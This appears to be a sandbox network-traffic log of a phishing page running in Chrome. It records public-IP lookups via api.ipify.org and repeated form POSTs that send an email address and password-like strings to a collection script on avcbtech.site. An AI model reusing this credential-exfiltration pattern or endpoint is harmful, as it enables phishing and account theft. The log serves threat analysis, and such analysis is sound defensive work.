2025-03-20 22:53:02 UTC	1371	IN	Data Raw: 7e f8 e1 a1 87 1e ca cb cb a3 4b ba ac ac 4c 96 65 9e e7 99 c3 48 92 24 9f cf 47 9e 94 a2 a2 a2 23 47 8e dc 73 cf 3d f5 3d 70 10 5e a0 fa a1 40 92 ff eb af bf 4e 99 32 e5 f0 e1 c3 d4 2f a7 b6 6e 08 12 92 c7 1e 7b 6c c6 8c 19 b4 59 00 c9 d7 19 b5 8f bf 7b f7 ee 65 65 65 db b7 6f af ad 8f df 64 32 09 82 a0 f6 f1 53 3f 7e f8 f8 41 fd b2 7c f9 f2 91 23 47 16 14 14 50 6b 69 ba e1 a8 a7 b0 74 db 61 7d a4 14 45 39 78 f0 e0 ed b7 df de a4 49 93 7a 1d 38 08 2f 50 fd 5a 43 e1 fd a2 a2 a2 59 b3 66 ad 5e bd 3a 98 ce ad d5 62 b1 58 ee bd f7 de 09 13 26 20 1a 5c bf d0 8e 7e 72 72 72 68 3e 7e 93 c9 44 0d 96 d4 3e fe 9c 9c 1c ea c7 0f 1f 3f d0 1f bf df bf 6c d9 b2 b9 73 e7 ee dd bb 97 d5 0e b1 58 2c 0e 87 83 1e 3b 9d 4e 8a 35 92 9f 85 2e 60 45 51 44 51 6c d4 a8 51 bf 7e Data Ascii: ~KLeH$G#Gs==p^@N2/n{lY{eeeod2S?~A\|#GPkita}E9xIz8/PZCYf^:bX& \~rrrh>~D>?lsX,;N5.`EQDQlQ~
2025-03-20 22:53:02 UTC	1371	IN	Data Raw: 6a fd e6 9b 6f d8 ce 3d 68 88 f8 fd 7e 56 a2 3c 21 21 81 1e b0 0a 3f 44 25 1f bf 06 c3 86 0d a3 8f ad a8 a8 a8 ef 33 03 0d 92 a5 4b 97 a6 a7 a7 53 05 1e 8d 2b 8d 5d a2 64 3d 65 8f 0d 06 43 62 62 22 bd da ae 5d bb e5 cb 97 d7 f7 09 01 9d 40 84 3f 00 54 63 67 e5 ca 95 9f 7f fe 39 f9 f4 6a 82 b5 cd 65 6d 2d 98 cb 6b e4 c8 91 0f 3f fc b0 d5 6a 85 71 ab e1 c2 f3 7c cb 96 2d 65 59 56 f7 e3 77 bb dd b5 ed c7 4f 1c 3b 76 4c 92 a4 bf fd ed 6f b4 4f 84 fd 1d 50 2b 96 2e 5d 3a 6d da b4 c3 87 0f 07 ac f3 a1 76 99 b2 c7 1c c7 c5 c7 c7 9f 3f 7f 5e 96 e5 ac ac ac d1 a3 47 df 7d f7 dd b8 08 63 85 fa 9e 76 44 34 1e 8f 47 51 94 bc bc bc 9b 6f be 99 fe 77 69 af f5 69 e2 4c 3d 57 d8 cc ba 53 a7 4e c7 8e 1d ab ef 53 01 75 c3 a1 43 87 fe eb bf fe 8b be 6e 5a 63 31 81 57 5f 1b Data Ascii: jo=h~V<!!?D%3KS+]d=eCbb"]@?Tcg9jem-k?jq\|-eYVwO;vLoOP+.]:mv?^G}cvD4GQowiiL=WSNSuCnZc1W_
2025-03-20 22:53:02 UTC	1371	IN	Data Raw: be 42 20 a1 3a 36 81 2f 1f 84 15 a8 fe 5f a0 9b f5 d9 b3 67 3f f9 e4 13 ba e7 32 87 2b 9b 44 6b 7f c2 ed b7 df 7e fd f5 d7 ab df 08 a2 1e ea 9a 68 30 18 2e bd f4 d2 71 e3 c6 5d 77 dd 75 21 7c 88 d9 6c ce cb cb 5b b7 6e 5d 18 06 08 1a 12 a1 f5 cb 57 d7 d8 67 21 81 b4 b4 b4 99 33 67 3e f8 e0 83 f4 a7 28 8a 54 6d 0c 61 a4 58 06 aa ff 17 28 b8 fa d5 57 5f 9d 3c 79 92 04 5e dd 4f 5d bb 59 b5 28 8a 8d 1a 35 7a f0 c1 07 69 4a ae ee a3 0f a2 1b 8e e3 58 06 f5 35 d7 5c f3 d0 43 0f a5 a4 a4 d4 f6 43 28 ee fa d5 57 5f 51 55 47 10 83 c0 97 0f 74 00 aa ff 27 14 d2 17 45 71 e5 ca 95 ec c7 43 6d 2a 58 b1 55 ed 39 72 87 0e 1d ae bd f6 5a 0a a3 e9 38 70 50 9f b0 4b 42 10 04 7a 7c d7 5d 77 3d fc f0 c3 b5 fd 1c 59 96 39 8e db b0 61 03 25 6c 83 18 04 be 7c a0 03 50 fd 3f a1 Data Ascii: B :6/_g?2+Dk~h0.q]wu!\|l[n]Wg!3g>(TmaX(W_<y^O]Y(5ziJX5\CC(W_QUGt'EqCm*XU9rZ8pPKBz\|]w=Y9a%l\|P?
2025-03-20 22:53:02 UTC	1371	IN	Data Raw: d0 a0 81 03 07 d2 f3 f0 e5 83 d0 80 ea 1b 28 81 bf 56 de 2a fa 8d 25 24 24 b4 6d db 56 97 01 82 86 8a cf e7 a3 1b 7d 90 f7 65 3a 8c f6 71 c3 3f 3a 10 5e c8 97 bf 7f ff fe b8 b8 38 ca c2 a3 1a ba e4 cb b7 5a ad 54 e6 ab 26 e8 56 c3 56 f9 83 06 0d 1a 3e 7c 38 7b 95 f9 f2 65 59 46 f3 5c 10 3c b8 b3 18 dc 6e 37 f5 d9 a3 1b 6e c0 58 19 a5 ee 1b 0c 86 e1 c3 87 23 b0 06 b4 d9 bb 77 2f b3 60 49 92 a4 a1 e5 14 ec 95 24 89 dc 59 8d 1b 37 d6 77 a4 a1 a0 2d 5a 31 0e f5 cb df bf 7f bf c3 e1 20 c9 af b6 5f 3e 05 17 ab 9d ea c5 c5 c5 91 ea b7 6f df fe bd f7 de 53 4b 3e 03 fd f2 41 6d c1 5a df 70 e8 d0 21 8a b6 a9 db ea 68 37 e0 a1 fb 78 46 46 06 02 6b 40 9b 9c 9c 1c 75 8a b5 46 e5 47 36 83 54 14 25 35 35 55 c7 31 d6 1a 3a 05 ab d5 4a b9 e8 f9 f9 f9 a7 4f 9f 3e 7e fc b8 Data Ascii: (V*%$$mV}e:q?:^8ZT&VV>\|8{eYF\<n7nX#w/`I$Y7w-Z1 _>oSK>AmZp!h7xFFk@uFG6T%55U1:JO>~
2025-03-20 22:53:02 UTC	1371	IN	Data Raw: fa 6a ba ef 87 61 74 b5 a3 ea 52 9e 54 9f e7 79 a3 d1 58 ab 8e c0 91 70 3a 75 88 20 08 6b d7 ae 7d e6 99 67 76 ef de 5d c9 97 af fd 46 b5 2f 9f 24 5f 51 94 aa be 7c 48 3e 08 2b 31 ad fa 05 05 05 da 5b 71 d5 92 96 96 96 98 98 18 9e 11 81 06 cc f6 ed db 47 8d 1a f5 d3 4f 3f 71 1c 17 da ea f6 96 5b 6e c9 cc cc 0c c3 d0 ea 0c 2a bb 4b 45 87 aa 0d 59 57 4b 30 db ff 0d 08 f8 f2 41 83 26 a6 27 95 05 05 05 21 dc 8f d0 5d 17 54 65 d7 ae 5d 2f bf fc f2 f7 df 7f 4f 2d 98 43 88 21 b5 6e dd fa 9e 7b ee 21 d9 88 cc d5 5e a5 08 7f 90 92 1f 4d 84 a3 5f fe 5d 77 dd 45 cf c3 97 0f f4 21 76 af 2d 49 92 42 b8 35 1b 0c 86 66 cd 9a 85 61 38 a0 01 93 97 97 37 65 ca 94 65 cb 96 51 f0 b6 a4 a4 24 84 e2 f3 dd ba 75 23 47 a8 76 ad fe fa 85 75 ac a8 94 8b ae 31 4d 89 26 cf 1e 7c f9 Data Ascii: jatRTyXp:u k}gv]F/$_Q\|H>+1[qGO?q[n*KEYWK0A&'!]Te]/O-C!n{!^M_]wE!v-IB5fa87eeQ$u#Gvu1M&\|

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.24	60853	104.26.13.205	443	692	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-20 22:53:14 UTC	549	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-20 22:53:14 UTC	465	IN	HTTP/1.1 200 OK Date: Thu, 20 Mar 2025 22:53:14 GMT Content-Type: application/json Content-Length: 20 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 9238c8d6eb3bf5f7-EWR server-timing: cfL4;desc="?proto=TCP&rtt=97945&min_rtt=96751&rtt_var=22206&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2817&recv_bytes=1121&delivery_rate=37117&cwnd=236&unsent_bytes=0&cid=768b3463b77104a5&ts=252&x=0"
2025-03-20 22:53:14 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.24	60854	104.26.12.205	443	692	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-20 22:53:15 UTC	389	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-20 22:53:15 UTC	432	IN	HTTP/1.1 200 OK Date: Thu, 20 Mar 2025 22:53:15 GMT Content-Type: application/json Content-Length: 20 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 9238c8da58830cc6-EWR server-timing: cfL4;desc="?proto=TCP&rtt=96711&min_rtt=96514&rtt_var=20660&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2815&recv_bytes=961&delivery_rate=38356&cwnd=227&unsent_bytes=0&cid=1a4c6dafcfb08415&ts=268&x=0"
2025-03-20 22:53:15 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.24	60858	104.26.13.205	443	692	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-20 22:53:22 UTC	549	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-20 22:53:22 UTC	465	IN	HTTP/1.1 200 OK Date: Thu, 20 Mar 2025 22:53:22 GMT Content-Type: application/json Content-Length: 20 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 9238c9080b33c352-EWR server-timing: cfL4;desc="?proto=TCP&rtt=96902&min_rtt=96828&rtt_var=20541&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2816&recv_bytes=1121&delivery_rate=38381&cwnd=231&unsent_bytes=0&cid=7405d3a192a8a0b0&ts=253&x=0"
2025-03-20 22:53:22 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.24	60857	104.168.138.190	443	692	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-20 22:53:22 UTC	634	OUT	POST /gtk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive Content-Length: 54 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-20 22:53:22 UTC	54	OUT	Data Raw: 61 69 3d 6f 6d 62 75 64 73 6d 61 6e 25 34 30 6f 6d 62 75 64 73 6d 61 6e 2e 67 6f 76 2e 61 75 26 70 72 3d 6e 7a 53 64 67 25 32 33 52 48 25 32 36 59 32 75 76 34 59 Data Ascii: ai=ombudsman%40ombudsman.gov.au&pr=nzSdg%23RH%26Y2uv4Y
2025-03-20 22:53:38 UTC	559	IN	HTTP/1.1 200 OK Date: Thu, 20 Mar 2025 22:53:22 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Set-Cookie: PHPSESSID=8b1068736fe2758448115dcaea0eca09; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-20 22:53:38 UTC	60	IN	Data Raw: 33 31 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 49 6e 63 6f 72 72 65 63 74 20 70 61 73 73 77 6f 72 64 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 31{"status":"error","message":"Incorrect password"}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.24	60859	104.26.12.205	443	692	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-20 22:53:22 UTC	389	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-20 22:53:23 UTC	432	IN	HTTP/1.1 200 OK Date: Thu, 20 Mar 2025 22:53:23 GMT Content-Type: application/json Content-Length: 20 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 9238c90ae95132fc-EWR server-timing: cfL4;desc="?proto=TCP&rtt=99705&min_rtt=97666&rtt_var=22747&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2816&recv_bytes=961&delivery_rate=38146&cwnd=221&unsent_bytes=0&cid=37eb25f0bd14c5d0&ts=261&x=0"
2025-03-20 22:53:23 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.24	60862	104.168.138.190	443	692	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-20 22:53:39 UTC	389	OUT	GET /gtk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-20 22:53:40 UTC	559	IN	HTTP/1.1 200 OK Date: Thu, 20 Mar 2025 22:53:39 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Set-Cookie: PHPSESSID=be98e5d8659715f09c19881ed0e36b6f; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-20 22:53:40 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.24	60870	104.168.138.190	443	692	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-20 22:53:54 UTC	634	OUT	POST /gtk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive Content-Length: 54 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-20 22:53:54 UTC	54	OUT	Data Raw: 61 69 3d 6f 6d 62 75 64 73 6d 61 6e 25 34 30 6f 6d 62 75 64 73 6d 61 6e 2e 67 6f 76 2e 61 75 26 70 72 3d 49 41 46 25 33 41 75 25 32 43 65 41 44 63 34 34 39 45 4d Data Ascii: ai=ombudsman%40ombudsman.gov.au&pr=IAF%3Au%2CeADc449EM
2025-03-20 22:54:11 UTC	559	IN	HTTP/1.1 200 OK Date: Thu, 20 Mar 2025 22:53:55 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Set-Cookie: PHPSESSID=09812caf685625f70620cf602fd79f5a; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-20 22:54:11 UTC	60	IN	Data Raw: 33 31 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 49 6e 63 6f 72 72 65 63 74 20 70 61 73 73 77 6f 72 64 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 31{"status":"error","message":"Incorrect password"}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.24	60873	104.26.13.205	443	692	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-20 22:53:55 UTC	549	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-20 22:53:55 UTC	466	IN	HTTP/1.1 200 OK Date: Thu, 20 Mar 2025 22:53:55 GMT Content-Type: application/json Content-Length: 20 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 9238c9d52c87c540-EWR server-timing: cfL4;desc="?proto=TCP&rtt=101839&min_rtt=99272&rtt_var=23604&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2816&recv_bytes=1121&delivery_rate=37489&cwnd=225&unsent_bytes=0&cid=e8286395ad125a2b&ts=252&x=0"
2025-03-20 22:53:55 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.24	60874	104.26.12.205	443	692	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-20 22:53:55 UTC	389	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-20 22:53:55 UTC	432	IN	HTTP/1.1 200 OK Date: Thu, 20 Mar 2025 22:53:55 GMT Content-Type: application/json Content-Length: 20 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 9238c9d8088a93b9-EWR server-timing: cfL4;desc="?proto=TCP&rtt=99094&min_rtt=98917&rtt_var=21045&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2816&recv_bytes=961&delivery_rate=37661&cwnd=252&unsent_bytes=0&cid=87a6f7d866dd5672&ts=252&x=0"
2025-03-20 22:53:55 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.24	60880	104.168.138.190	443	692	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-20 22:54:12 UTC	441	OUT	GET /gtk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=be98e5d8659715f09c19881ed0e36b6f
2025-03-20 22:54:12 UTC	495	IN	HTTP/1.1 200 OK Date: Thu, 20 Mar 2025 22:54:12 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-20 22:54:12 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.24	60882	104.168.138.190	443	692	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-20 22:54:19 UTC	634	OUT	POST /gtk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive Content-Length: 35 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-20 22:54:19 UTC	35	OUT	Data Raw: 61 69 3d 6f 6d 62 75 64 73 6d 61 6e 25 34 30 6f 6d 62 75 64 73 6d 61 6e 2e 67 6f 76 2e 61 75 26 70 72 3d Data Ascii: ai=ombudsman%40ombudsman.gov.au&pr=
2025-03-20 22:54:20 UTC	559	IN	HTTP/1.1 200 OK Date: Thu, 20 Mar 2025 22:54:19 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Set-Cookie: PHPSESSID=4ae7247d0b3458ccb01bb77db41e505f; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-20 22:54:20 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.24	60884	104.26.13.205	443	692	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-20 22:54:20 UTC	549	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-20 22:54:20 UTC	465	IN	HTTP/1.1 200 OK Date: Thu, 20 Mar 2025 22:54:20 GMT Content-Type: application/json Content-Length: 20 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 9238ca7159110cba-EWR server-timing: cfL4;desc="?proto=TCP&rtt=96600&min_rtt=96392&rtt_var=20694&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2815&recv_bytes=1121&delivery_rate=38278&cwnd=216&unsent_bytes=0&cid=fbb1c3442dd922b8&ts=432&x=0"
2025-03-20 22:54:20 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.24	60885	104.168.138.190	443	692	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-20 22:54:20 UTC	441	OUT	GET /gtk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=be98e5d8659715f09c19881ed0e36b6f
